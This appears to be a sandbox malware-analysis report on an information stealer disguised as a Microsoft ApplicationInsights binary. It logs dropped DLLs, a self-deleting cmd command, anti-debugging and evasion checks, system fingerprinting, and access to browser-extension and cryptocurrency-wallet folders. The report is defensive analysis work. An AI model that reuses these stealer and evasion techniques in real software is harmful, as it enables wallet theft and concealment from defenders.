Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00412560 push eax; ret

2_2_0041258E

Source: sqlite3[1].dll.2.dr	Static PE information: section name: /4
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /19
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /35
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /51
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /63
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /77
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /89
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /102
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /113
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /124
Source: sqlite3.dll.2.dr	Static PE information: section name: /4
Source: sqlite3.dll.2.dr	Static PE information: section name: /19
Source: sqlite3.dll.2.dr	Static PE information: section name: /35
Source: sqlite3.dll.2.dr	Static PE information: section name: /51
Source: sqlite3.dll.2.dr	Static PE information: section name: /63
Source: sqlite3.dll.2.dr	Static PE information: section name: /77
Source: sqlite3.dll.2.dr	Static PE information: section name: /89
Source: sqlite3.dll.2.dr	Static PE information: section name: /102
Source: sqlite3.dll.2.dr	Static PE information: section name: /113
Source: sqlite3.dll.2.dr	Static PE information: section name: /124

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00405E20

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File created: C:\ProgramData\sqlite3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File created: C:\ProgramData\sqlite3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit			Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_0040B0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0040B0B0

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405740

2_2_00405740

Source: C:\Windows\SysWOW64\timeout.exe TID: 5652

Thread sleep count: 42 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll

Jump to dropped file

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405740

2_2_00405740

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00401000
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	2_2_00408820
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00407560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_004011F0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00408650
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00408410
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose,	2_2_00404DD0

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00403C80 VirtualProtect ?,00000004,00000100,00000000,?,?,00000104

2_2_00403C80

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00405E20

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA,

2_2_00409850

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_0040ADE0 mov eax, dword ptr fs:[00000030h]

2_2_0040ADE0

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,LocalFree,

2_2_00409930

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00410E40 GetLocalTime,SystemTimeToFileTime,

2_2_00410E40

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA,

2_2_00409850

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405840 memset,GetVersionExA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,

2_2_00405840

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_004097B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_004097B0

Stealing of Sensitive Information:

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
